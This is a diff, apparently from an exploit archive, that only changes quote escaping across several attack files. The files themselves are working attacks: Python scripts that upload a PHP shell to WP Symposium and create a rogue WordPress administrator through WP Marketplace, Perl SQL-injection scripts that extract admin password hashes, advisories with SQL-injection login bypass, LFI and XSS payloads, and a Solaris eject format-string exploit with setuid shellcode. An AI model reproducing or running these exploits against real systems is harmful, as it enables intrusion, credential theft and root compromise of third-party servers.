L.append(payloadcontent)
|
||||
L.append(\'--\' + LIMIT + \'--\')
|
||||
L.append(\'\')
|
||||
L.append('--' + LIMIT + '--')
|
||||
L.append('')
|
||||
body = CRLF.join(L)
|
||||
return body
|
||||
|
||||
banner = \"\"\"
|
||||
banner = """
|
||||
___ ___ __
|
||||
| Y .-----.----.--| .-----.----.-----.-----.-----.
|
||||
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|
||||
|. / \\ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|: | |__|
|
||||
|::.|:. |
|
||||
`--- ---\'
|
||||
`--- ---'
|
||||
___ ___ _______ _______ __
|
||||
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|
||||
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|
||||
|. / \\ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|
||||
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|
||||
|: |: | |: 1 |_____| |__|
|
||||
|::.|:. |::.| |::.. . |
|
||||
`--- ---`---\' `-------\'
|
||||
`--- ---`---' `-------'
|
||||
Wp-Symposium
|
||||
Sh311 Upl04d Vuln3r4b1l1ty
|
||||
v14.11
|
||||
|
@ -151,17 +151,17 @@ banner = \"\"\"
|
|||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
\"\"\"
|
||||
"""
|
||||
|
||||
commandList = optparse.OptionParser(\'usage: %prog -t URL -f FILENAME.PHP [--timeout sec]\')
|
||||
commandList.add_option(\'-t\', \'--target\', action=\"store\",
|
||||
help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\",
|
||||
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
|
||||
commandList.add_option('-t', '--target', action="store",
|
||||
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
|
||||
)
|
||||
commandList.add_option(\'-f\', \'--file\', action=\"store\",
|
||||
help=\"Insert file name, ex: shell.php\",
|
||||
commandList.add_option('-f', '--file', action="store",
|
||||
help="Insert file name, ex: shell.php",
|
||||
)
|
||||
commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\",
|
||||
help=\"[Timeout Value] - Default 10\",
|
||||
commandList.add_option('--timeout', action="store", default=10, type="int",
|
||||
help="[Timeout Value] - Default 10",
|
||||
)
|
||||
|
||||
options, remainder = commandList.parse_args()
|
||||
|
@ -180,31 +180,31 @@ print(banner)
|
|||
|
||||
socket.setdefaulttimeout(timeout)
|
||||
|
||||
url_symposium_upload = host+\'/wp-content/plugins/wp-symposium/server/php/\'
|
||||
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
|
||||
|
||||
content_type = \'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$\'
|
||||
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
|
||||
|
||||
randDirName = id_generator()
|
||||
randShellName = id_generator()
|
||||
|
||||
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
|
||||
|
||||
headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\',
|
||||
\'content-type\': content_type,
|
||||
\'content-length\': str(len(bodyupload)) }
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
|
||||
'content-type': content_type,
|
||||
'content-length': str(len(bodyupload)) }
|
||||
|
||||
try:
|
||||
req = urllib2.Request(url_symposium_upload+\'index.php\', bodyupload, headers)
|
||||
req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
read = response.read()
|
||||
|
||||
if \"error\" in read or read == \"0\" or read == \"\":
|
||||
print(\"[X] Upload Failed :(\")
|
||||
if "error" in read or read == "0" or read == "":
|
||||
print("[X] Upload Failed :(")
|
||||
else:
|
||||
print(\"[!] Shell Uploaded\")
|
||||
print(\"[!] Location: \"+url_symposium_upload+randDirName+randShellName+\".php\\n\")
|
||||
print("[!] Shell Uploaded")
|
||||
print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
|
||||
|
||||
except urllib2.HTTPError as e:
|
||||
print(\"[X] \"+str(e))
|
||||
print("[X] "+str(e))
|
||||
except urllib2.URLError as e:
|
||||
print(\"[X] Connection Error: \"+str(e))
|
||||
print("[X] Connection Error: "+str(e))
|
||||
|
|
|
@ -10,14 +10,14 @@
|
|||
#
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# The vulnerable function is located on \"wpmarketplace/libs/cart.php\" file:
|
||||
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
|
||||
#
|
||||
# function ajaxinit(){
|
||||
# if(isset($_POST[\'action\']) && $_POST[\'action\']==\'wpmp_pp_ajax_call\'){
|
||||
# if(function_exists($_POST[\'execute\']))
|
||||
# call_user_func($_POST[\'execute\'],$_POST);
|
||||
# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
|
||||
# if(function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'],$_POST);
|
||||
# else
|
||||
# echo __(\"function not defined!\",\"wpmarketplace\");
|
||||
# echo __("function not defined!","wpmarketplace");
|
||||
# die();
|
||||
# }
|
||||
#}
|
||||
|
@ -25,8 +25,8 @@
|
|||
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
|
||||
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
|
||||
#
|
||||
# if (function_exists($_POST[\'execute\']))
|
||||
# call_user_func($_POST[\'execute\'], $_POST);
|
||||
# if (function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'], $_POST);
|
||||
# else
|
||||
# ...
|
||||
# ...
|
||||
|
@ -61,7 +61,7 @@
|
|||
#
|
||||
# ---------------------------------------------------------------------
|
||||
#
|
||||
# Dork google: index of \"wpmarketplace\"
|
||||
# Dork google: index of "wpmarketplace"
|
||||
#
|
||||
# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
|
||||
#
|
||||
|
@ -76,8 +76,8 @@ import optparse
|
|||
|
||||
# Check url
|
||||
def checkurl(url):
|
||||
if url[:8] != \"https://\" and url[:7] != \"http://\":
|
||||
print(\'[X] You must insert http:// or https:// procotol\')
|
||||
if url[:8] != "https://" and url[:7] != "http://":
|
||||
print('[X] You must insert http:// or https:// procotol')
|
||||
sys.exit(1)
|
||||
else:
|
||||
return url
|
||||
|
@ -85,29 +85,29 @@ def checkurl(url):
|
|||
# Check if file exists and has readable
|
||||
def checkfile(file):
|
||||
if not os.path.isfile(file) and not os.access(file, os.R_OK):
|
||||
print \'[X] \'+file+\' file is missing or not readable\'
|
||||
print '[X] '+file+' file is missing or not readable'
|
||||
sys.exit(1)
|
||||
else:
|
||||
return file
|
||||
|
||||
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
|
||||
return \'\'.join(random.choice(chars) for _ in range(size))
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
banner = \"\"\"
|
||||
banner = """
|
||||
___ ___ __
|
||||
| Y .-----.----.--| .-----.----.-----.-----.-----.
|
||||
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|
||||
|. / \\ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|: | |__|
|
||||
|::.|:. |
|
||||
`--- ---\'
|
||||
`--- ---'
|
||||
___ ___ __ __ __
|
||||
| Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----.
|
||||
|. | _ | _| <| -__| _| _ | | _ | __| -__|
|
||||
|. \\_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|
||||
|. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|
||||
|: | | |__|
|
||||
|::.|:. |
|
||||
`--- ---\'
|
||||
`--- ---'
|
||||
WP Marketplace
|
||||
R3m0t3 C0d3 Ex3cut10n
|
||||
(Add WP Admin)
|
||||
|
@ -126,14 +126,14 @@ banner = \"\"\"
|
|||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
\"\"\"
|
||||
"""
|
||||
|
||||
commandList = optparse.OptionParser(\'usage: %prog -t URL [--timeout sec]\')
|
||||
commandList.add_option(\'-t\', \'--target\', action=\"store\",
|
||||
help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\",
|
||||
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
|
||||
commandList.add_option('-t', '--target', action="store",
|
||||
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
|
||||
)
|
||||
commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\",
|
||||
help=\"[Timeout Value] - Default 10\",
|
||||
commandList.add_option('--timeout', action="store", default=10, type="int",
|
||||
help="[Timeout Value] - Default 10",
|
||||
)
|
||||
|
||||
options, remainder = commandList.parse_args()
|
||||
|
@ -154,30 +154,30 @@ socket.setdefaulttimeout(timeout)
|
|||
username = id_generator()
|
||||
pwd = id_generator()
|
||||
|
||||
body = urllib.urlencode({\'action\' : \'wpmp_pp_ajax_call\',
|
||||
\'execute\' : \'wp_insert_user\',
|
||||
\'user_login\' : username,
|
||||
\'user_pass\' : pwd,
|
||||
\'role\' : \'administrator\'})
|
||||
body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
|
||||
'execute' : 'wp_insert_user',
|
||||
'user_login' : username,
|
||||
'user_pass' : pwd,
|
||||
'role' : 'administrator'})
|
||||
|
||||
headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\'}
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
|
||||
|
||||
print \"[+] Tryng to connect to: \"+host
|
||||
print "[+] Tryng to connect to: "+host
|
||||
try:
|
||||
req = urllib2.Request(host+\"/\", body, headers)
|
||||
req = urllib2.Request(host+"/", body, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
html = response.read()
|
||||
|
||||
if html == \"\":
|
||||
print(\"[!] Account Added\")
|
||||
print(\"[!] Location: \"+host+\"/wp-login.php\")
|
||||
print(\"[!] Username: \"+username)
|
||||
print(\"[!] Password: \"+pwd)
|
||||
if html == "":
|
||||
print("[!] Account Added")
|
||||
print("[!] Location: "+host+"/wp-login.php")
|
||||
print("[!] Username: "+username)
|
||||
print("[!] Password: "+pwd)
|
||||
else:
|
||||
print(\"[X] Exploitation Failed :(\")
|
||||
print("[X] Exploitation Failed :(")
|
||||
|
||||
except urllib2.HTTPError as e:
|
||||
print(\"[X] \"+str(e))
|
||||
print("[X] "+str(e))
|
||||
except urllib2.URLError as e:
|
||||
print(\"[X] Connection Error: \"+str(e))
|
||||
print("[X] Connection Error: "+str(e))
|
||||
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
. . .
|
||||
._ | _. .|_ _. _.;_/
|
||||
[_)|(_]\\_|[ )(_](_.| \\.net
|
||||
[_)|(_]\_|[ )(_](_.| \.net
|
||||
| ._|
|
||||
\"QDBlog v0.4 - MULTIPLE VULNERABILITIES\"
|
||||
"QDBlog v0.4 - MULTIPLE VULNERABILITIES"
|
||||
by Omni
|
||||
|
||||
1) Infos
|
||||
|
@ -29,8 +29,8 @@ Team : Playhack.net Security
|
|||
|
||||
[ authenticate.php Script - Line 7 - 9 ]
|
||||
|
||||
$sql = \"SELECT permissions, username FROM $prefix\".\"auth WHERE username = \'\" . $_POST[\'username\'] . \"\' AND password =
|
||||
MD5(\'\".$_POST[\'wordpass\'].\"\');\";
|
||||
$sql = "SELECT permissions, username FROM $prefix"."auth WHERE username = '" . $_POST['username'] . "' AND password =
|
||||
MD5('".$_POST['wordpass']."');";
|
||||
|
||||
$query = mysql_query($sql, $conn);
|
||||
|
||||
|
@ -42,7 +42,7 @@ properly sanitized before being used, so an attacker can inject SQL code and gai
|
|||
--- [ PoC ] ---
|
||||
===============
|
||||
|
||||
Put in the username field (in login.php) a code like 1\' OR \'1\' = \'1\' # and in the password filed what you want.
|
||||
Put in the username field (in login.php) a code like 1' OR '1' = '1' # and in the password filed what you want.
|
||||
Click.. login and.. have fun :D
|
||||
|
||||
--- [ Local File Inclusion ] ---
|
||||
|
@ -53,7 +53,7 @@ index.php as shown below:
|
|||
|
||||
[ categories.php script - Line 2 ]
|
||||
|
||||
include(\"themes/$theme/cat_top.php\");
|
||||
include("themes/$theme/cat_top.php");
|
||||
|
||||
[ end index.php script ]
|
||||
|
||||
|
@ -67,9 +67,9 @@ http://remote_host/qdblog/categories.php?theme=../../../../../../../etc/passwd%0
|
|||
|
||||
Take again a look to categories.php:
|
||||
|
||||
in this file there is \"an other vulnerability\", File Traversal:
|
||||
in this file there is "an other vulnerability", File Traversal:
|
||||
|
||||
Line 3 : $file1 = fopen(\"themes/$theme/cat_mid.html\", \"r\");
|
||||
Line 3 : $file1 = fopen("themes/$theme/cat_mid.html", "r");
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -4,26 +4,26 @@
|
|||
#
|
||||
require LWP::UserAgent;
|
||||
|
||||
print \"#
|
||||
print "#
|
||||
# phpEventCalendar <= v0.2.3 SQL Injection Exploit
|
||||
# By Iron - ironwarez.info
|
||||
# Thanks to Silentz for the help :)
|
||||
# Greets to everyone at RootShell Security Group & dHack
|
||||
#
|
||||
# Example target url: http://www.target.com/phpeventcalendar/
|
||||
Target url?\";
|
||||
Target url?";
|
||||
chomp($target=<stdin>);
|
||||
if($target !~ /^http:\\/\\//)
|
||||
if($target !~ /^http:\/\//)
|
||||
{
|
||||
$target = \"http://\".$target;
|
||||
$target = "http://".$target;
|
||||
}
|
||||
if($target !~ /\\/$/)
|
||||
if($target !~ /\/$/)
|
||||
{
|
||||
$target .= \"/\";
|
||||
$target .= "/";
|
||||
}
|
||||
print \"User id to retrieve name/password from? (1 = admin)\";
|
||||
print "User id to retrieve name/password from? (1 = admin)";
|
||||
chomp($target_id=<stdin>);
|
||||
$target .= \"eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=\".$target_id;
|
||||
$target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id;
|
||||
|
||||
$ua = LWP::UserAgent->new;
|
||||
$ua->timeout(10);
|
||||
|
@ -33,20 +33,20 @@ $response = $ua->get($target);
|
|||
|
||||
if ($response->is_success)
|
||||
{
|
||||
if($response->content =~ /<span class=\"display_header\">(.*)<\\/span>/i)
|
||||
if($response->content =~ /<span class="display_header">(.*)<\/span>/i)
|
||||
{
|
||||
($username,$password) = split(/,/,$1);
|
||||
print \"Username: \".$username;
|
||||
print \"\\nPassword: \".$password;
|
||||
print "Username: ".$username;
|
||||
print "\nPassword: ".$password;
|
||||
}
|
||||
else
|
||||
{
|
||||
print \"\\nUnable to retrieve username/password.\";
|
||||
print "\nUnable to retrieve username/password.";
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
die \"Error: \".$response->status_line;
|
||||
die "Error: ".$response->status_line;
|
||||
}
|
||||
|
||||
# milw0rm.com [2007-07-01]
|
||||
|
|
|
@ -26,52 +26,52 @@
|
|||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
system(\"color 02\");
|
||||
print \"\\t\\t############################################################\\n\\n\";
|
||||
print \"\\t\\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\\n\\n\";
|
||||
print \"\\t\\t# by Stack #\\n\\n\";
|
||||
print \"\\t\\t############################################################\\n\\n\";
|
||||
system("color 02");
|
||||
print "\t\t############################################################\n\n";
|
||||
print "\t\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\n\n";
|
||||
print "\t\t# by Stack #\n\n";
|
||||
print "\t\t############################################################\n\n";
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
use LWP::UserAgent;
|
||||
die \"Example: perl $0 http://victim.com/path/\\n\" unless @ARGV;
|
||||
system(\"color f\");
|
||||
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
|
||||
system("color f");
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
#the username of news manages
|
||||
$user=\"username\";
|
||||
$user="username";
|
||||
#the pasword of news manages
|
||||
$pass=\"passwd\";
|
||||
$pass="passwd";
|
||||
#the tables of news manages
|
||||
$tab=\"booking_user\";
|
||||
$fil=\"details_view.php\";
|
||||
$varo=\"event_id\";
|
||||
$tab="booking_user";
|
||||
$fil="details_view.php";
|
||||
$varo="event_id";
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";
|
||||
$b->agent(\'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\');
|
||||
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
|
||||
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
$host = $ARGV[0] . \"/\".$fil.\"?\".$varo.\"=-1+union+all+select+1,1,concat_ws(char(58),char(58),\".$user.\",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,\".$pass.\",1,1,1 from+\".$tab.\"/*\";
|
||||
$host = $ARGV[0] . "/".$fil."?".$varo."=-1+union+all+select+1,1,concat_ws(char(58),char(58),".$user.",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,".$pass.",1,1,1 from+".$tab."/*";
|
||||
$res = $b->request(HTTP::Request->new(GET=>$host));
|
||||
$answer = $res->content;
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
if ($answer =~ /::(.*?)::::/){
|
||||
print \"\\nBrought to you by v4-team.com...\\n\";
|
||||
print \"\\n[+] Admin User : $1\";
|
||||
print "\nBrought to you by v4-team.com...\n";
|
||||
print "\n[+] Admin User : $1";
|
||||
}
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
if ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\";
|
||||
print \"\\t\\t# Exploit has ben aported user and password hash #\\n\\n\";}
|
||||
else{print \"\\n[-] Exploit Failed...\\n\";}
|
||||
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
|
||||
print "\t\t# Exploit has ben aported user and password hash #\n\n";}
|
||||
else{print "\n[-] Exploit Failed...\n";}
|
||||
########################################
|
||||
#-------------------Exploit exploited by Stack --------------------#
|
||||
########################################
|
||||
|
|
|
@ -18,13 +18,13 @@
|
|||
####################
|
||||
2. Vulnerabilities:
|
||||
####################
|
||||
2.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter.
|
||||
2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
|
||||
2.1.1. Exploit:
|
||||
Check the exploit/POC section.
|
||||
2.2. File (image) Upload without premission.
|
||||
2.2.1. Exploit:
|
||||
Check the exploit/POC section.
|
||||
2.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\".
|
||||
2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
|
||||
2.3.1. Exploit:
|
||||
Check the exploit/POC section.
|
||||
|
||||
|
@ -32,7 +32,7 @@
|
|||
3. Exploits/POCs:
|
||||
####################
|
||||
Original Exploit URL: http://bugreport.ir/index.php?/46/exploit
|
||||
3.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter.
|
||||
3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
|
||||
-------------
|
||||
LFI:
|
||||
http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd
|
||||
|
@ -42,15 +42,15 @@
|
|||
Uploader link:
|
||||
http://[URL]/[Forum Path]/upload.php
|
||||
-------------
|
||||
3.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\".
|
||||
3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
|
||||
-------------
|
||||
<form action=\"http://[URL]/[Forum path]/search.php\" method=\"post\">
|
||||
<form action="http://[URL]/[Forum path]/search.php" method="post">
|
||||
<tr><td class=g>XSS: <small></td><tr>
|
||||
"<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT>
|
||||
<br><tr><td class=g><INPUT TYPE=\"text\" class=\"txt\" NAME=\"search\" SIZE=\"30\" MAXLENGTH=\"100\"><br/>
|
||||
<tr><td class=g><INPUT TYPE=\"RADIO\" checked NAME=\"type\" VALUE=\"themen\"> search only in topics</td></tr>
|
||||
<tr><td class=g><INPUT TYPE=\"RADIO\" NAME=\"type\" VALUE=\"beitraege\"> search in topics and answers</td></tr>
|
||||
<INPUT TYPE=\"SUBMIT\" class=\"btn\" NAME=\"submit\" VALUE=\"submit\"></td></tr>
|
||||
<br><tr><td class=g><INPUT TYPE="text" class="txt" NAME="search" SIZE="30" MAXLENGTH="100"><br/>
|
||||
<tr><td class=g><INPUT TYPE="RADIO" checked NAME="type" VALUE="themen"> search only in topics</td></tr>
|
||||
<tr><td class=g><INPUT TYPE="RADIO" NAME="type" VALUE="beitraege"> search in topics and answers</td></tr>
|
||||
<INPUT TYPE="SUBMIT" class="btn" NAME="submit" VALUE="submit"></td></tr>
|
||||
-------------
|
||||
####################
|
||||
4. Solution:
|
||||
|
|
|
@ -26,23 +26,23 @@
|
|||
|
||||
#define NOP 0xac15a16e
|
||||
|
||||
#define VULPROG \"/usr/bin/eject\"
|
||||
#define VULPROG "/usr/bin/eject"
|
||||
|
||||
char shellcode[] = /* from scz\'s funny shellcode for SPARC */
|
||||
\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */
|
||||
\"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */
|
||||
\"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\"
|
||||
\"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\"
|
||||
\"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\"
|
||||
\"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\"
|
||||
\"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\"
|
||||
\"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\";
|
||||
char shellcode[] = /* from scz's funny shellcode for SPARC */
|
||||
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */
|
||||
"\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */
|
||||
"\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08"
|
||||
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
|
||||
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
|
||||
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
|
||||
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
|
||||
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
|
||||
|
||||
/* get current stack point address */
|
||||
|
||||
long get_sp(void)
|
||||
{
|
||||
__asm__(\"mov %sp,%i0\");
|
||||
__asm__("mov %sp,%i0");
|
||||
}
|
||||
|
||||
/* prints a long to a string */
|
||||
|
@ -78,14 +78,14 @@ void create_shellbuf(char* shellbuf, int align, int retloc)
|
|||
/* check align parameter */
|
||||
|
||||
if (align < 0 || align > 3) {
|
||||
printf(\"Error: align is %d, it should be between 0 and 3\\n\", align);
|
||||
printf("Error: align is %d, it should be between 0 and 3\n", align);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* check retloc parameter */
|
||||
|
||||
if (contains_zero(retloc) || contains_zero(retloc+2) ) {
|
||||
printf(\"Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\\n\", retloc, retloc+2);
|
||||
printf("Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\n", retloc, retloc+2);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
@ -127,7 +127,7 @@ void create_shellbuf(char* shellbuf, int align, int retloc)
|
|||
/* at this point the shell buffer should be exactly SHELL bytes long, including the null-terminator */
|
||||
|
||||
if (strlen(shellbuf) + 1 != SHELL) {
|
||||
printf(\"Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\\n\",
|
||||
printf("Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\n",
|
||||
strlen(shellbuf)+1, SHELL);
|
||||
exit(1);
|
||||
}
|
||||
|
@ -145,32 +145,32 @@ void execute_vulnprog(char* pattern, char* shellbuf)
|
|||
/* create message files */
|
||||
|
||||
if (strlen(pattern) > 512) {
|
||||
printf(\"Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\\n\", strlen(pattern));
|
||||
printf("Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\n", strlen(pattern));
|
||||
}
|
||||
|
||||
if ( !(fp = fopen(\"messages.po\", \"w+\")) ) {
|
||||
perror(\"Error openning messages.po for writing.\");
|
||||
if ( !(fp = fopen("messages.po", "w+")) ) {
|
||||
perror("Error openning messages.po for writing.");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
fprintf(fp, \"domain \\\"messages\\\"\\n\");
|
||||
fprintf(fp, \"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\");
|
||||
fprintf(fp, \"msgstr \\\"%s\\\\n\\\"\", pattern);
|
||||
fprintf(fp, "domain \"messages\"\n");
|
||||
fprintf(fp, "msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n");
|
||||
fprintf(fp, "msgstr \"%s\\n\"", pattern);
|
||||
fclose(fp);
|
||||
|
||||
system(\"/usr/bin/msgfmt messages.po\");
|
||||
system(\"cp messages.mo SUNW_OST_OSCMD\");
|
||||
system(\"cp messages.mo SUNW_OST_OSLIB\");
|
||||
system("/usr/bin/msgfmt messages.po");
|
||||
system("cp messages.mo SUNW_OST_OSCMD");
|
||||
system("cp messages.mo SUNW_OST_OSLIB");
|
||||
|
||||
/* prepere the environment for the VULNPROG process */
|
||||
|
||||
env[0] = \"NLSPATH=:.\";
|
||||
env[0] = "NLSPATH=:.";
|
||||
env[1] = shellbuf; /* put the shellbuf in env */
|
||||
env[2] = NULL; /* end of env */
|
||||
|
||||
/* execute the vulnerable program using our custom environment */
|
||||
|
||||
execle(VULPROG, VULPROG, \"-x\", NULL, env);
|
||||
execle(VULPROG, VULPROG, "-x", NULL, env);
|
||||
}
|
||||
|
||||
|
||||
|
@ -178,18 +178,18 @@ void execute_vulnprog(char* pattern, char* shellbuf)
|
|||
|
||||
void usage(char *prg)
|
||||
{
|
||||
printf(\"Usage:\\n\");
|
||||
printf(\" %s [command] [options]\\n\\n\", prg);
|
||||
printf(\"Commands:\\n\");
|
||||
printf(\" dump Dumps the stack\\n\");
|
||||
printf(\" shell Dumps the shell buffer\\n\");
|
||||
printf(\" exploit Exploits /usr/bin/eject\\n\\n\");
|
||||
printf(\"Options:\\n\");
|
||||
printf(\" --num=96 Number of words to dump from the stack\\n\");
|
||||
printf(\" --align=2 Sets the alignment (0, 1, 2 or 3)\\n\");
|
||||
printf(\" --shellofs=-6 Offset of the shell buffer\\n\");
|
||||
printf(\" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\\n\");
|
||||
printf(\" --retloc=0xeffffa3c Location of the return address\\n\");
|
||||
printf("Usage:\n");
|
||||
printf(" %s [command] [options]\n\n", prg);
|
||||
printf("Commands:\n");
|
||||
printf(" dump Dumps the stack\n");
|
||||
printf(" shell Dumps the shell buffer\n");
|
||||
printf(" exploit Exploits /usr/bin/eject\n\n");
|
||||
printf("Options:\n");
|
||||
printf(" --num=96 Number of words to dump from the stack\n");
|
||||
printf(" --align=2 Sets the alignment (0, 1, 2 or 3)\n");
|
||||
printf(" --shellofs=-6 Offset of the shell buffer\n");
|
||||
printf(" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\n");
|
||||
printf(" --retloc=0xeffffa3c Location of the return address\n");
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
@ -212,20 +212,20 @@ main(int argc, char **argv)
|
|||
usage(argv[0]);
|
||||
}
|
||||
|
